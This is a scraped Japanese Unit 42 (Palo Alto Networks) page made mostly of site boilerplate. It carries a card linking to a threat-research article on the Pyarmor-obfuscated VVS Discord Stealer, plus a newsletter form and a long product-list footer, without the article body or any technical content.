  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
